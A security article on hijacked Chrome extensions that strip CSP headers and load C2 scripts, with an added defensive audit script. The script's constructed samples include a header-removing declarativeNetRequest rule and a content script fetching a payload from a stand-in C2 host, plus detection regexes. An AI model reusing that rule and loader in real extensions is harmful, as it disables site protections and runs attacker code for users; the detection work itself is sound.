Recent security research has identified a concerning trend: legitimate Google Chrome extensions, including QuickLens and ShotBird, turning malicious after a change of ownership. Both had held the Chrome Web Store's "Featured" badge before the transfer. Subsequent updates added code that strips security response headers from visited sites, defeating Content Security Policy (CSP) protections, and then loads JavaScript from remote command-and-control (C2) servers at runtime. Because the malicious logic is fetched at runtime rather than shipped in the extension package, static analysis of the store submission sees nothing and the operators can swap the payload at will; on every page load the injected script fingerprints the user and executes whatever code the C2 returns.
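The two capabilities described above leave traces in the extension package itself: a declarativeNetRequest rule that removes CSP or other security headers, and a content script that loads code from a remote origin. The following is an added example, not code from the page or from the extensions it names, of a small static audit over those artifacts. The manifest, rule set and content script below are constructed for illustration (the extension name, `cdn.example-c2.invalid` origin and `auditExtension` function are hypothetical), not material from QuickLens or ShotBird.

```javascript
// Added example: static audit of a Chrome extension's declarativeNetRequest
// rules and scripts for (a) stripping of security response headers and
// (b) runtime loading of script from a remote origin. All inputs are
// constructed samples, not real extension code.

const SECURITY_HEADERS = new Set([
  "content-security-policy",
  "content-security-policy-report-only",
  "x-frame-options",
  "x-content-type-options",
  "strict-transport-security",
  "cross-origin-opener-policy",
  "cross-origin-embedder-policy",
]);

// Constructed rule set, in the shape of a declarativeNetRequest rules JSON file.
// Rule 1 removes CSP and X-Frame-Options on every document; rule 2 is benign.
const SAMPLE_RULES = [
  {
    id: 1, priority: 1,
    action: {
      type: "modifyHeaders",
      responseHeaders: [
        { header: "Content-Security-Policy", operation: "remove" },
        { header: "X-Frame-Options", operation: "remove" },
      ],
    },
    condition: { urlFilter: "*", resourceTypes: ["main_frame", "sub_frame"] },
  },
  {
    id: 2, priority: 1,
    action: { type: "block" },
    condition: { urlFilter: "||tracker.example", resourceTypes: ["script"] },
  },
];

// Constructed manifest for a hypothetical extension.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Example Screenshot Helper",
  version: "2.1.0",
  permissions: ["declarativeNetRequest", "scripting", "storage"],
  host_permissions: ["<all_urls>"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"], run_at: "document_start" }],
};

// Constructed content script: injects a <script> pointing at a remote origin.
// On a site with a CSP this would be blocked; once rule 1 strips the header it runs.
const SAMPLE_CONTENT_SCRIPT = `
const s = document.createElement("script");
s.src = "https://cdn.example-c2.invalid/payload.js?v=" + Date.now();
document.documentElement.appendChild(s);
`;

// Report every modifyHeaders rule that removes or rewrites a security header.
function findHeaderStripping(rules) {
  const findings = [];
  for (const rule of rules) {
    if (rule.action?.type !== "modifyHeaders") continue;
    for (const h of rule.action.responseHeaders ?? []) {
      if (SECURITY_HEADERS.has(h.header.toLowerCase())) {
        findings.push({
          ruleId: rule.id,
          header: h.header,
          operation: h.operation,
          urlFilter: rule.condition?.urlFilter ?? "(none)",
        });
      }
    }
  }
  return findings;
}

// Patterns for runtime loading of remote code from the extension's own JS:
// script.src to an http(s) URL, dynamic import() of one, or fetch() followed
// shortly by eval/new Function.
const REMOTE_LOAD_PATTERNS = [
  /\.src\s*=\s*["'`]https?:\/\//i,
  /import\(\s*["'`]https?:\/\//i,
  /fetch\(\s*["'`]https?:\/\/[^)]*\)[\s\S]{0,200}?(eval|new Function)/i,
];

function findRemoteCodeLoading(source) {
  return REMOTE_LOAD_PATTERNS.filter((re) => re.test(source)).map((re) => re.source);
}

// Combine the signals: an extension that can disable CSP on every site and
// also pulls script from a remote server is rated high; either alone is medium.
function auditExtension(manifest, rules, scripts) {
  const strippedHeaders = findHeaderStripping(rules);
  const remoteLoads = Object.entries(scripts).flatMap(([file, src]) =>
    findRemoteCodeLoading(src).map((pattern) => ({ file, pattern })));
  const broadHosts = (manifest.host_permissions ?? [])
    .some((p) => p === "<all_urls>" || p === "*://*/*");
  const stripsCsp = strippedHeaders
    .some((f) => f.header.toLowerCase().startsWith("content-security-policy"));
  let risk = "low";
  if (stripsCsp && remoteLoads.length > 0 && broadHosts) risk = "high";
  else if (strippedHeaders.length > 0 || remoteLoads.length > 0) risk = "medium";
  return { risk, strippedHeaders, remoteLoads, broadHosts };
}

const report = auditExtension(SAMPLE_MANIFEST, SAMPLE_RULES, { "content.js": SAMPLE_CONTENT_SCRIPT });
console.log(JSON.stringify(report, null, 2));
```

The regexes are deliberately crude and catch only unobfuscated loaders; the point of the check is the combination of signals, since header stripping alone is also what some legitimate content-blocking and frame-busting extensions do. Running the audit on each update of an installed extension, not only at install time, is what catches the post-transfer change the text describes.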
Beyond browser-level manipulation, the campaign uses "ClickFix" lures to gain host-level access. Victims are shown a fake browser-update prompt that instructs them to paste and run a PowerShell command, which installs malware that harvests credentials, payment data and other sensitive browser data. This escalation from browser-based abuse to full endpoint compromise underscores the supply-chain risk of third-party extensions in both corporate and personal environments: the permissions an extension was granted at install time belong to whoever owns it now, and an allowlist keyed on extension ID offers no protection when the ID stays the same and only the owner changes.